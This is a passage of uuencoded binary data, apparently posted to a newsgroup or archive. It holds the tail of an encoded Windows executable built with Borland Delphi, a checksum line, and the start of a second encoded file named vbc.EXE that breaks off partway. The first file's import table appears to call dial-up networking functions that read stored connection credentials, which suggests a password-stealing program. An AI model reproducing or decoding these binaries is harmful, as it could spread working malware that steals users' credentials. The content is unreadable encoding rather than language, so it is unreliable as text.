M5$``,_^)?('TZR:+RX7)>0.#P0/!^0*+/5A40`"
)1(_TBPJ)3?B+3?B)002+
M3?B)"(O&BU((@\H"B1"#P`2)1?S_!>Q30`"#ZP0!'?!30`#H%@D``.F$````
M.QU05$``?THI'5!40`"#/5!40``,?0T#'5!40``SP*-05$``H5140``!'514
M0`"
+TX/*`HD0@\`$B47\_P7L4T``@^L$`1WP4T``Z,$(``#K,HO#Z+S]__^)
M1?PSP%I9662)$&@'($``@#TM4$```'0*:`!40`#H-?'__\/ITP<``.OEBT7\
M7UY;65E=PXU``%6+[%%35E>+V#/`H_Q30`"`/?A30```=1_HGO?__X3`=1;'
M!?Q30``(````QT7\"
````.EA`0``,\E5:*8A0`!D_S%DB2&`/2U00```=`IH
M`%1``.B_\/__B_.#[@2+'O;#`G4/QP7\4T``"0```.GU````_PWL4T``B\,E
M_/__?X/H!"
D%\%-``/;#`71%B\:#Z`R+4`B#^@Q\"/?"`P``@'0/QP7\4T``
M"@```.FV````B\8KPCM0"'0/QP7\4T``"@```.F>`````]J+\.B0^/__@>/\
M__]_B\8#PXOX.SU45$``=2PI'5140``!'5!40`"
!/5!40```/```?@7H'_O_
M_S/`B47\Z'$'``#IA0```(L0]L("=!R!XOS__W^#^@1]#,<%_%-```L```#K
M-X,(`>LIB\>#>`0`=`N#.`!T!H-X"
`Q]#,<%_%-```L```#K$XM0"`/:Z`3X
M__^+TXO&Z#OZ__^A_%-``(E%_#/`6EE99(D0:*TA0`"
`/2U00```=`IH`%1`
M`.B/[___P^DM!@``Z^6+1?Q?7EM97<.+P%-65U6#Q/B+\H/&!X/F_(/^#'T%
MO@P```"+Z(/M!(M]`('G_/__?XO%`\>+V#O^#X*#````B]<KUHD4)#L=5%1`
M`'4XBP0D*0545$``BP0D`0505$``@SU05$``#`^-3`$``(L$)`$%5%1``(L$
M)"
D%4%1``(OWZ3,!``"+V/8#`G4-B\.+4`@!%"3H,/?__X,\)`Q\&XO=`]Z+
M!"2#R`*)`XO#@\`$Z,CW___I_@```(OWZ?<```"+QBO'B40D!#L=5%1``'5G
MH5!40``[1"0$?%.+1"0$*0505$``BT0D!`$%5%1``(,]4%1```Q]&*%05$``
M`0545$```S505$``,\"C4%1``(O&*\<!!?!30`"+10`E`P``@`OPB74`L`'I
MH@```.A5^?__B]T#W_8#`G5-B].+PHM("(D,)(L,)#M,)`1S#@,4)(O:BP0D
M*40D!.LLZ&;V__^+1"
0$*00D@SPD#'P.B\4#QHL4).B-^/__ZSH#-"2+W0/>
M@R/^ZRZ+`ZD```"
`="$E_/__?P/#B]B+5"0$B\/HYOG__X3`=`F+W0/?Z0W_
M__\SP.L9B\8KQP$%\%-``(M%`"4#``"`"_")=0"P`5E:75]>6\.058OL45-6
M5XORB]B`/?A30```=1/H+_3__X3`=0HSP(E%_.F1````,])5:#DD0`!D_S)D
MB2*`/2U00```=`IH`%1``.A<[?__B]:+P^C?_?__A,!T!8E=_.LVB\;HH_K_
M_XOXB\.#Z`2+`"
7\__]_@^@$._!]`HO&A?]T$8O7B\N1Z*H```"+P^C_^___
MB7W\,\!:65EDB1!H0"
1``(`]+5!```!T"F@`5$``Z/SL___#Z9H#``#KY8M%
M_%]>6UE=PXU``(7`=`K_%11`0``)P'4!P[`"
Z0(```##D(/@?XL-!%!``(7)
M=`-:_]%(BH"-)$``>0OHHA$``(N`!````.DG"```R\S(R=?/R,W.V]C*V=K<
MW=[?X.'C`.3EPXO`4.AV$0``CX`$````PXU``%97B<:)UXG(.?=_$W0OP?D"
M>"
KSI8G!@^$#\Z1?7L.-=`[\C7P/_,'Y`G@1_?.EB<�.#Q@.#QP/SI/Q?
M7L-7B<>(S8G(P>`09HG(B='!^0)X"?.KB=�/SJE_#D/\E#&%``(O`4S/;
M:@#H[O___X/X!W4<:@'HXO___R4`_P``/0`-``!T!ST`!```=0*S`8O#6\.0
M58OL@\3T#[<%`$!``(E%^(U%_%!J`6H`:.@E0`!H`@``@.A)Z___A<!U33/`
M56C!)4``9/\P9(D@QT7T!````(U%]%"
-1?A0:@!J`&@$)D``BT7\4.@>Z___
M,\!:65EDB1!HR"5``(M%_%#H^.K__\/I$@(``.OO9J$`0$``9B7`_V:+5?AF
M@^(_9@O"
9J,`0$``B^5=PP!33T945T%215Q";W)L86YD7$1E;'!H:5Q25$P`
M1E!536%S:U9A;'5E`````-OCF]DM`$!``,.+P(7`=`>+"
+(!_U'\PX`]!$!`
M``%V$&H`:@!J`&C?^NT.Z./I___#B\"`/01`0```=!904%)4:@)J`&CD^NT.
MZ,7I__^#Q`A8PU1J`6H`:.#Z[0[HL>G__X/$!%C#@#T$0$```78'4%/IW/__
M_\.-0`"
%R709BT$!@#GI=`R`.>MU#`^^P$%!ZP.#P04!P<.+P(`]!$!```%V
M'%!24>C/____451J`6H`:.'Z[0[H5^G__UE96EC#B\"`/01`0``!=A%25&H!
M:@!HXOKM#N@WZ?__6L.04%*`/01`0``!=@]4:@)J`&CC^NT.Z!KI__]:6,.-
M0`"
+1"0$]T`$!@````^%K0```($XWOKM#HM0&(M(%'0P_.C;_O__BQ4(4$``
MA=(/A(L```#_TH7`#X2!````BU0D#.CN_O__B<*+1"
0$BT@,@T@$`E,QVU97
M562+&U-04E&+5"0H:@!0:(8G0`!2Z++H__^+?"0HZ)4.``#_L`````")H```
M``"
+;PB+7P3'1P2R)T``@\,%Z,S^____X^DA````Z&@.``"+B`````"+$8F0
M`````(M!".E._O__N`$```##BT0D!(M4)`CW0`0&````=!^+2@3'0@0(*$``
M4U9758MJ"
(/!!>BN_O___]%=7UY;N`$```##B\"+1"0PQT`$6RA``.@$#@``
MBY``````BPJ)B`````"+0@R#8`3]@3C>^NT.=`V+0@CHV_W__^CB_?__,<"#
MQ!1DBQ!9BQ*)$5U?7ENX`0```,.-0`#HNPT``(N0`````(L*B8@`````BT((
MZ*']__]:BV0D+#'`662)"%A=Z$?^____XL,QTHM,)`B+1"0$@\$%9(D"_]'"
M#`##B\")%"3I``0``,.-0`!5B^R+50B+`CV2``#`?RQT7#V.``#`?Q5T5RT%
M``#`=%PMAP```'0]2'1.ZV`%<?__/X/H`G(V=##K4CV6``#`?Q%T/2V3``#`
M="Y(=!-(="3K.BW]``#`="^#Z#UT)NLLL,CK*K#)ZR:PS>LBL,_K'K#(ZQJP
MU^L6L,[K$K#8ZPZPVNL*L-GK!K#*ZP*P_R7_````BU(,Z%C___]=P@0`BT0D
M!/=`!`8```!U;/SHJ?S__XM4)`AJ`%!H?2E``%+HN^;__XM<)`2!.][Z[0Z+
M4Q2+0QAT'8L5"
%!``(72#X0;____B=C_TH7`#X0/____BU,,Z$/]__^+#0!0
M0`"%R70"_]&+3"0$N-D```"+412)%"3IXP(``#'`PS'2C47T9(L*9(D"B0C'
M0`18*4``B6@(B05P5$``PXO`,=*+!7!40`!DBPHYR'4(BP!DB0+#BPF#^?]T
M"#D!=?6+`(D!PXU``%6+[%-65[]L5$``BT<(A<!T2(M?#(MP!#/256AB*D``
M9/\R9(DBA=M^$DN)7PR+1-X$A<!T`O_0A=M_[C/`6EE99(D0ZQ3IK?S__^BP
M____Z)_]___H[OW__U]>6UW#D%6+[%-65Z%T5$``A<!T2XLP,]N+>`0STE5H
MPBI``&3_,F2)(COS?A2+!-]#B1UX5$``A<!T`O_0._-_[#/`6EE99(D0ZQ3I
M3?S__^A0____Z#_]___HCOW__U]>6UW#D(D%=%1``#'`B05X5$``B15\5$``
MBT($B04,4$``Z-;^___&!1!00```Z'+____#D%.+!1Q00`"
[+$!``+D*````
M,=+W\8#",(@32X7`=?*+!2100`#HZ@$``(L5)%!``)(IT+LX0$``B<*#X@^*
MDD1`0`"
($TO!Z`1U[5O#C4``OVQ40`"+'8140`"++8!40`#_=QS_=R"+-[D+
M````\Z5?7C'`AP4<4$``]]@9P$#)P@P`PU-65U6[;%1``+X<4$``OR!00`"
`
M>R0`=1:#/P!T$8L7B=`STHD7B^C_U8,_`'7O@STD4$```'0^Z#____^`/2Q0
M0```=!:Z'$!``+@`4D``Z'<(``#H]0<``.L3:@!H/$!``&@<0$``:@#H8>3_
M_S/`HR100`"`>R0"=0J#/@!U!3/`B4,,Z`'^__^`>R0!=@6#/@!T'8M#$(7`
M=!;H0@,``(M#$(M0"#M0!'0&4N@EY/__Z*S]__^`>R0!=0/_4RB`>R0`=`7H
M`/___X,[`'4(BP90Z._C__^+`U:+\(O[N0L```#SI5[KC%!O<G1I;VYS($-O
M<'ER:6=H="
`H8RD@,3DX,RPY-R!";W)L86YD`%U?7EO#B\")!1Q00`#IW?[_
M_\./!2100`#IZ?___\.+$(72=!O'``````"+2OA)?`^)2OAU"E"-0OCH;/?_
M_UC#B\`QTF:+$/?"
`$```'4:@_H(<A6!^@`!``!U$V;'````@\`(Z;7___]F
MQP```,-0Z,'C___#4.C&____6,.#Q.1J'(U4)`124.B@X___@7PD$``0``!U
M!HM$)`3K`C/`@\0<PXO`58OL@<3@_O__4U:)1?QH!0$``(V%X_[__U!J`.@?
MX___QD7N`(U%^%!H/P`/`&H`:.0N0`!H`0``@.@YX___A<!U;3/`56CQ+4``
M9/\P9(D@QT7H!0```(U%Z%"-1>Y0:@!J`(V%X_[__U"+1?A0Z`SC__^%P'0:
MC47H4(U%[E!J`&H`:`0O0`"+1?A0Z.[B__\SP%I9662)$&CX+4``BT7X4.C(
MXO__P^GB^?__Z^^+1?Q0C87C_O__4.B@XO__:@6-1?-0:@/H@^+__U#H9>+_
M_S/V@+WC_O__``^$KP```(!]\P!U"
H!][@`/A)\```"-A>/^__]0Z&KB__^+
MV(V%X_[__P/8ZP%+@#LN=`J-A>/^__\[V'7PC87C_O__.]AT;4.`?>X`=!R-
M1>Y04^@KXO__:@)J`(V%X_[__U#H$^+__XOPA?9U1H!]\P!T0(U%\U!3Z`7B
M__]J`FH`C87C_O__4.CMX?__B_"
%]G4@QD7U`(U%\U!3Z.'A__]J`FH`C87C
M_O__4.C)X?__B_"+QEY;B^5=PP```%-O9G1W87)E7$)O<FQA;F1<1&5L<&AI
M7$QO8V%L97,``````%6+[(/$^%-65XE%_*$,0$``B47X@WWX`'0Y,\!5:$,O
M0`!D_S!DB2"
+7?B+1?S_4P0SP%I9662)$.L*Z<SW___H%_G__XM%^(L`B47X
M@WWX`'7'7UY;65E=PXO`BQ4(0$``B1"C"$!``,.+P%6+[%&)1?PSTE5HV"]`
M`&3_,F2)(HM%_(M`!.AT____,\!:65EDB1!HWR]``(M%_#L%"
$!``'4,BT7\
MBP"C"$!``.L?H0A`0`"%P'06BQ`[5?QU"8M5_(L2B1#K!HL`A<!UZL/I^_?_
M_^O"65W#B\`STHE0$(E0#%*-4!!2_W`(_W`4_S#H,N#__X7`=`,SP,/H;N#_
M_X/X;73SPS/`PU&+4`R%TGX:,\F)2`Q1C4PD!%%2_W`4_S#H'^#__X7`=`0S
MP%G#Z#K@___K]_\PQT`$L-<``.BRW___2'4!P^@AX/__PU:+\#/`B48,B480
MBT8$+;'7``!T"
TAT($AT+NE)`0``N````("Z`0```+D#````QT8<Y"]``.LG
MN````$"Z`0```+D"````ZP^X````P+H!````N0,```#'1AP3,$``QT8D0#!`
M`,=&(!`P0`"`?D@`#X2N````:@!H@````%%J`%)0C49(4.@DW___@_C_#X3K
M````B0:!?@2SUP``#X6C````_TX$:@#_-N@0W___0`^$R0```"
V!````<P(S
MP&H`:@!0_S;H)-___T`/A*T```!J`(O4:@!2:(````"-EDP!``!2_S;HZ][_
M_UI(#X6+````,\`[PG-,@+P&3`$``!IT`T#K[VH"
:@`KPE#_-NC:WO__0'1G
M_S;HR-[__TAU7>LBQT8D$#!``(%^!++7``!T!&KVZP)J]>B(WO__@_C_=#N)
M!H%^!+'7``!T%_\VZ&'>__^%P'00@_@"=0?'1B`3,$``,\!>P_\VZ#;>___'
M1@2PUP``N&D```#KZ<=&!+#7``#HE-[__^O;C8A,`0``B4@4,\F)"
,=`!+#7
M``#'0`B`````B4@,B4@0QT`86#!``(E('(E(((E()(U`2(72=!NU@HH*0H@(
M0(3)=!&*"D*("$"$R70'_LUUZ$B(*,.+4`2!^K+7``!U"/]0'(7`=0[#@?JQ
MUP``=/>X9P```.E'\O__BU`$@?JRUP``=0C_4""%P'4.PX'ZL=<``'3WN&<`
M``#I(O+__XO`4XO8BU`$@>JQUP``=`Z#^@)W&?]0'(7`=0N+P_]3)(7`=0);
MP^CV\?__Z_<]-%!``'3PN&<```#KZXO`4U:+\(O:BU8$@>JPUP``=`J#^@-W
M&>BI____B\:)7@3_5AB%P'0%Z+CQ__]>6\.X9@```.BK\?__Z_&ZL=<``.N^
MNK+7``#KM[JSUP``Z[!65XOR@7@$LM<``'4NBW@4`W@,BU`(*U`,.]%_%@%0
M#"O*4%&+RO.D_U`<A<!U,UE8Z]H!2`SSI%]>PST`4D``=1114E#HJ/___UA:
M68%X!++7``!TM[AI````Z#3Q___KUN@M\?__65CKS8O*NE1`0`"
#^4!^(8/I
M0%!1N4````#H>O___^B%`@``@[@$`````'4-65CKU87)#X]@____PUE8PS/)
MB@I"Z5+___]3,]N*&BO+?@M04HO1Z*O___]:6(O+6T+I-?___[J40$``N0(`
M``#H)O___^EN_O__@7@$LM<``'4>BT@,.T@(?0D#2!2($?]`#,-04O]0'(7`
M=2=:6.OB/0!20`!U$E)0Z-[^__]86H%X!++7``!TR;AI````Z6OP___H9O#_
M_UI8PU*-4?_H,?___XO4N0$```#HNO[__UK#,\GK`%97B_!1B_J#R?^P`/*N
M]]%)B_I:*]&+QE'H`?___UF+QHO77U[IBO[__XO`58OL,\!5:.`T0`!D_S!D
MB2#_!?130`!U+;@T4$``Z-G]__^X`%)``.C/_?__Z-;C__^XW%-``.A0^/__
MN,Q30`#H1OC__S/`6EE99(D0:.<T0`##Z?/R___K^%W#C4``58OL,\!5:)DU
M0`!D_S!DB2"
#+?130``!#X.!````,\"C'%!``#/`HR100``SP*,H4$``Q@4N
M4$```L8%+U!```+&!3!00``#9L<%S%-`````9L<%W%-```$`Z-7O__^$P'0%
MZ/SO___HN_#__[@T4$``NJ0U0`#H?OS__[@`4D``NJ0U0`#H;_S__^CTVO__
MHQA00`#H6MO__Z,44$``,\!:65EDB1!HH#5``,/I.O+__^OX7<,```````#_
M)4!A0`"
+P/\E/&%``(O`_R4X84``B\#_)31A0`"+P/\E,&%``(O`58OL4[@(
M````A<!T0X,]G%1```!]"
KCB````Z,3V__]H"````&I`Z+S___^+V(7;=0RX
MX@```.BH]O__ZPQ3H9Q40`!0Z*[___^)':Q40`!;7<.0B@V85$``BP6<5$``
MA,EU*&2+%2P```"
+!(+#Z(S___^+!9Q40`!0Z'#___^%P'0!PXL%K%1``,-0
MZ%[___^%P'39PY!5B^R!Q/C^__]3:`4!``"-A?O^__]0H:140`!0Z!____^-
MA?O^___HM/;__XO8B1V@0$``A=MU"
J&<0$``HZ!`0`"XF$!``.BP^/__6XOE
M7<.-0`!0:@#H[/[__[J80$``4HD%I%1``(E"
!.B0____6ECH_?/__\-5B^PS
MP%5H!3=``&3_,&2)(/\%J%1``#/`6EE99(D0:`PW0`##Z<[P___K^%W#B\"#
M+:A40``!PU6+[#/`56@]-T``9/\P9(D@_P6P5$``,\!:65EDB1!H1#=``,/I
MEO#__^OX7<.+P(,ML%1```'#_R5,84``B\#_)4AA0`"
+P%6+[#/`56B%-T``
M9/\P9(D@_P6T5$``,\!:65EDB1!HC#=``,/I3O#__^OX7<.+P(,MM%1```'#
M4X'$X/O__XO8C40D!#/)NAP$``#H1^W__\=$)`0<!```C50D"(O#N0$!``#H
M[^S__\<$)/____]4C40D"
%!J`.A[____A<`/A94```"#/"0`=0C&A"0,`P``
M`+J$.$``N`!20`#HMOO__XU4)`CH4?S__[J(.$``Z*/[__^-E"
0+`@``Z#O\
M__^ZD#A``.B-^___Z#'Z__^#/"0`=1:ZF#A``+@`4D``Z'/[___H%_K__^LD
MLB*X`%)``.B;^___C90D#`,``.CX^___LB+HB/O__^CQ^?__N`!20`#H9?O_
M_X'$(`0``%O#```#0SH@!3H@3#HB```$(B!0.@````9U;FMN;W<`4U:!Q`3P
M__]0@<0(\?__C40D"
#/)NO`>``#H.>S__\=$)`@(`0``QP0D\!X``#/`B40D
M!(U$)`10C40D!%"-1"004&H`:@#H9/[__X7`=1^+="0$A?9^%XU<)`B+PX/`
M!.B2_O__@<,(`0``3G7M@<3X'@``7EO#58OL,\!5:#<Y0`!D_S!DB2`SP%I9
M662)$&@^.4``P^F<[O__Z_A=PP4```!(.4``$#=``.`V0`#L-$``C#1``$@W
M0``8-T``D#=``&`W0```````&#E``%6+[(/$],8%+%!```&X0#E``.@U_?__
MZ!3____H__'__XU`````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````#(3B\``C4``````````
M``"
,'D``%"!``(@C0`!2=6YT:6UE(&5R<F]R("`@("!A="`P,#`P,#`P,`"+
MP$5R<F]R`(O`,#$R,S0U-C<X.4%"
0T1%1B`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`-
M"
HO`````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````5&$``(Q@``````````````````!B8P``#&$`````
M`````````````(YC```880``````````````````SF,``"AA````````````
M``````#L8P``,&$``````````````````$YD``!(80``````````````````
M``````````!B80``>F$``))A``"
J80``QF$``-1A``#D80``\&$``/YA```.
M8@``&F(``"9B```X8@``2F(``%QB``!R8@``A&(``)1B``"F8@``M&(``,)B
M``#.8@``X&(``/!B``#\8@``"&,``!IC```J8P``.&,``$9C``!48P``````
M`&YC``"
`8P```````)QC``"P8P``P&,```````#<8P```````/IC```(9```
M%F0``"
1D```X9````````%QD``!V9````````&ME<FYE;#,R+F1L;`````!$
M96QE=&5#<FET:6-A;%-E8W1I;VX```!,96%V94-R:71I8V%L4V5C=&EO;@``
M``!%;G1E<D-R:71I8V%L4V5C=&EO;@````!);FET:6%L:7IE0W)I=&EC86Q3
M96-T:6]N````5FER='5A;$9R964```!6:7)T=6%L06QL;V,`````3&]C86Q&
M<F5E````3&]C86Q!;&QO8P````!6:7)T=6%L475E<GD`````;'-T<FQE;D$`
M````;'-T<F-P>4$`````3&]A9$QI8G)A<GE%>$$`````1V5T5&AR96%D3&]C
M86QE````1V5T4W1A<G1U<$EN9F]!````1V5T36]D=6QE1FEL94YA;65!````
M`$=E=$QO8V%L94EN9F]!`````$=E=$QA<W1%<G)O<@````!'971#;VUM86YD
M3&EN94$```!&<F5E3&EB<F%R>0```$5X:710<F]C97-S````5W)I=&5&:6QE
M````4V5T1FEL95!O:6YT97(`````4V5T16YD3V9&:6QE`````%)T;%5N=VEN
M9````%)E861&:6QE`````%)A:7-E17AC97!T:6]N`````$=E=%-T9$AA;F1L
M90````!'971&:6QE4VEZ90```$=E=$9I;&54>7!E````0W)E871E1FEL94$`
M``!#;&]S94AA;F1L90!U<V5R,S(N9&QL`````$=E=$ME>6)O87)D5'EP90``
M`$UE<W-A9V5";WA!`&%D=F%P:3,R+F1L;`````!296=1=65R>59A;'5E17A!
M`````%)E9T]P96Y+97E%>$$```!296=#;&]S94ME>0!O;&5A=70S,BYD;&P`
M````5F%R:6%N=$-L96%R``!K97)N96PS,BYD;&P`````5&QS4V5T5F%L=64`
M``!4;'-'971686QU90```$QO8V%L06QL;V,`````1V5T36]D=6QE2&%N9&QE
M00````!'971-;V1U;&5&:6QE3F%M94$``')A<V%P:3,R+F1L;`````!287-'
M971%;G1R>41I86Q087)A;7-!`````%)A<T5N=6U%;G1R:65S00``````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````'!```AP0`"
<5$``$(!`````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````$```-`$```(P"C`2,!HP(C`J
M,#(P.C!"
,$HP4C!:,&(P:C!R,'HP@C"*,)(PFC"B,*HPLC"Z,,(PRC#2,-HP
M!C$.,18Q'C$F,2XQ-C$^,4<Q:#%P,=@QWS$G,YXS[3,S-$8TO#0`-4$U=36!
M-9PU+S9^-[HWUS?B-^TW]3?_-PDX$S@I."
\X/3A0.%HX8#AN.'0X?#B..)HX
MJ3BU.+TXR#C..-LXX3C[.`(Y##D6.2`Y+#DW.4HY4#E8.6(Y>SF&.:`YL3G.
M.>8Y[CDN.D0ZDSJS.M$ZW#OI.QP\(CPZ/$,\3#Q7/&`\9SQV/'T\GSSX/``]
M?CV?/:0]JCT6/AP^+#XU/GH^@SZ9/K<^PS[+/OX^*#]"/VP_=3^%/XT_DS^<
M/Z,_J#^N/\$_RC_H/^X_]C\````@``#X````(#`F,#@P4#!<,&0P>S"
*,)HP
MNC#2,/8P_C`$,0HQ/#%@,7XQCC&4,9PQ]C$!,@HR$#(@,BDR>C*!,I$RFS*A
M,JDRKS*U,KPRQC)M,Y4SLS._,\<S(30G-"\T4C1I-'<T&C59-6DU?S6=-;,U
MRC7?-1DV+C9*-GXVLC;:-O@V.S=\-Z0W[S<7.',YD3FS.>0Y[3GX.2,Z.#J#
M.I8ZJCK>.N8Z[#KU.@`[#SL4.RT[.#M`.TL[73MC.VD[@CN5.YH[GSO!.\\[
MUSO<.^\[]#L"
/*H\MCQY/8\]S3WC/14_)C]F/VT_?S^=/Z8_LC^Y/P```#``
M`,````"*,+,PNC#!,(`QNS$*,K4R4#.",^`S&S23-)\TIC2P-+\TR33;-/,T
M_S0--10U&S4A-2@U+S4W-4`U6C5?-6DU;C5]-8<UE#6J-;(UNC7"-<HUWS40
M-APV)C8L-D8V5S9_-I@VH3:F-JLVQ3;,-N<V\S8`-Q(W'S<K-S@W2C=2-UHW
M9S=S-X`WDC?T-_DW##@B.#<X/#A/.'$X'SDR.40Y2#E,.5`Y5#E8.5PY8#ED
M.6PY>#E^.0```$```!`````0,!0P&#````"
````4`````#`$,`@P##``````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
@````````````````````````````````````````````
`
end
sum -r/size 49214/15872


begin 644

  
vbc.EXE
M35K@`!H`G`!`````___F`H``````````/@````$`^U!J<@``````````````
M```````````````````````!````6P```*`````Z`0``XP&"`M8!@@+(`8("
M=P&"`C8!@@(/`8("Z`""`L,`@@*J`(("BP""`F\`@@)*`(("%0""`EP"``"0
M`@``MP(``)4#``"``P``:@,``%0#```/`P``!0,``/("``#D`@``V`(``!X!
MI`(:`:0"%@&D`EL$```M!```<P0``(L$``"H!```+`4``%,%``!=!0``\`4`
M`(D%``!L!@``=@8``*4&``"S!@``Q@8``.4&``#S!@``_P8``!0'```D!P``
M/@<``$X'``!C!P``<P<``(T'``"
C!P``P@<``/\'``"M#```S!(``+,2``":
M$@``?1(``%82``!&$@``01(```H2``#Q$0``[!$``-`1``#%$0``HA$``(81
M``!\$0``7A$``$<1```^$0``_!(``%T4``"`%```Q10``*P4``"D%```WQ0`
M`.\4```-%0``$A4``"L5``"4%0``1A8``#$7```E%P``'A<``&T9```T&0``
M&QD``!09```^&```&!@```\8``#W%P``;!<``*89``#<&@``4QH``,T9```\
M&P``?QL``/X;```>'```#QT``$8;```4'0``*AT``$\=``!Q'0``CQT``*`=
M``#+'0``Z1T```0?```>'P``6Q\``)(B``#>(0``72$``#\A```Z(0``J2``
M`)L?``!W'P``;R,``'0C``":(P``SR,``#XD```=)0``%"4``%LD``"$)0``
MQR4``&PF``!%)@``(B8``/HE``#R)0``6B<``&0G``"
/)P``VR<``+8G``"M
M)P``_R<``/4G````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````````+JD`BZ)%E,"
M##-
M(8LN`@"+'BP`CMJC?0",!GL`B1YW`(DNCP#H0`'$/G4`B\>+V+G_?_SRKN-#
M0R8X!77V@,V`]]F)#G4`N0(`T^.#PQ"#X_")'GD`C-(KZK^D`H[')HL^4`.!
M_P`"<PB_``(FB3Y0`[$$T^]'.^]S`^F^`8O?`]J)'H<`B1Z+`*%[`"O8CL"T
M2E?-(5_3Y_J.THOG^[BD`H[`)HD^4`.#/K`"
%'9'@#Y]``-R0'<'@#Y^`!YR
M-[@!6+L"`,TA<BJT9XL>L`+-(7(@M$B[`0#-(7(70*./`$B.P+1)S2%R"K@!
M6+L``,TA<P/I10&T`,T:B1:!`(D.@P`*P'0,N$``CL"[<``FQ@<!,^TNC@93
M`KX.!+\:!.BZ`/\V<P#_-G$`_S9O`/\V;0#_-FL`F@T`@@)0D`[H#0(NC@93
M`E97OAH$OQH$Z(L`7U[+RXOLM$R*1@3-(;D.`+HO`.G:`!ZX`#7-(8D>6P"
,
M!ET`N`0US2&)'E\`C`9A`+@%-<TAB1YC`(P&90"X!C7-(8D>9P",!FD`N``E
MC,J.VKI?`<TA'\,>+HX>4P(>N``EQ19;`,TA'QZX!"7%%E\`S2$?'K@%)<46
M8P#-(1^X!B7%%F<`S2$?RX'^#@1T!#+DZP*T_XO7B]X[WW0C)H`__W08@?X.
M!'0&)CIG`>L$)CAG`7<&)HIG`8O3@\,&Z]D[UW0;B]HF@#\`)L8'_P9T!R;_
M7P('Z[$F_U<"
!^NJP[1`NP(`S2'#N1X`NCT`+HX>4P+HZO^X`P!0D`[H$@$`
M``7`58OL'KBD`H[8@SZ2`"!U!;@!`.L<BQZ2`-'CT>.+1@B+5@:)AY8`B9>4
M`/\&D@`SP!]=RU6+[!ZXI`*.V!ZT0S+`Q58&S2$?<@K$7@HFB0\SP.L$4.B^
M`1]=RU6+[!ZXI`*.V!ZT0[`!Q58&BTX*S2$?<@0SP.L$4.B:`1]=RQZXI`*.
MV!_+58OL5AZXI`*.V(MV"
`OV=37K';BD`H[`)O\.D@`FBQZ2`-'CT>.XI`*.
MP";_GY0`N*0"CL`F@SZ2``!UUI`.Z"+^_QX4`9`.Z(+^D`[H)_Z#?@8`=14+
M]G4(_QX8`?\>'`'_=@20#N@._ED?7EW"
!@!5B^P>N*0"CM@SP%!0_W8&Z'S_
M'UW+58OL'KBD`H[8N`$`4#/`4/]V!NAC_Q]=RQZXI`*.V#/`4+@!`%`SP%#H
M3?\?RQZXI`*.V+@!`%!0,\!0Z#K_'\M;#E.`^1!S$(O8T^#3XO;9@,$0T^L+
MT\N`Z1"
2,\#3XLL'#@8+R7T,]]/WT8/#`8/1`.LO`\-S!('"`!"*Z;$$TN4"
M]8KHT^@#T(K%)0\`RP<.!@O)?0SWT_?1@\,!@]$`Z]$KPW,$@>H`$(KYL032
MYS+;*].*Z-/H`]"
*Q24/`,M5B^Q6'KBD`H[8BW8$"_9\%8/^6'X#OE<`B3;>
M`HJ$X`*8B_#K#??>@_XC?^G'!MX"
__^XI`*.P":)-G\`N/__'UY=P@(`58OL
M5AZXI`*.V(MV!%;HJ?^+QA]>7<("
`%6+[!ZXI`*.V+@`1(M>!LTADB6``!]=
MRU6+[(/L(E97'KBD`H[8!L1^"HM>"(/[)'=<@/L"<E>+1@Z+3A`+R7T2@'X&
M`'0,)L8%+4?WV??8@]D`C7;>XQ"
1*]+W\Y'W\S:(%$;C"NOP*]+W\S:(%$8+
MP'7TC4[>]]D#SOQ.-HH$+`IS!`0ZZP,"
1@2JXNZP`*H'BU8,BT8*'U]>B^5=
MP@X`58OL'KBD`H[8,\!0_W8(_W8&_W8$N`H`4+``4+!A4.A5_Q]=P@8`58OL
M'KBD`H[8BUX&T>.XI`*.P":!I[("__VT0HI&#(M>!HM."HM6",TA<@+K!5#H
MI_Z9'UW+58OL'KBD`H[8BT8*"T8,=0B,7@S'1@HZ`_]V!(M&!@M&"'4'C-JX
M1P/K!HM6"(M&!E)0_W8,_W8*D`[HY0:#Q`A24.A=_QZX2P-0_W8,_W8*D`[H
MHQ^#Q`B+5@R+1@H?7<(*`%6+[(/L`AZXI`*.V/]V"
O]V"#/`4%#$7@0F@S__
M=06X`@#K`[@!`,1>!"
8!!R:+!U#H:/^)5@J)1@@6C4;^4/]V"O]V")`.Z%G\
M@\0("\!TNXM6"HM&"!^+Y5W""`!1BNBQ!-/H`]"*Q8KCT^M9`\N*W"4/`(/C
M#SO1=0([P\-5B^P>N*0"
CMB+7@;1X[BD`H[`)O>'L@("`'0&N`4`4.L4'K0_
MBUX&BTX,Q58(S2$?<@+K!%#HA_T?7<L>N*0"
CMBY!0#K1(O9T>.XI`*.P";'
MA[("
``"+P;H4`/?JNJ0"B]B.PB;&AR0!_XO!NA0`]^H%(`%0B\&Z%`#WZKJD
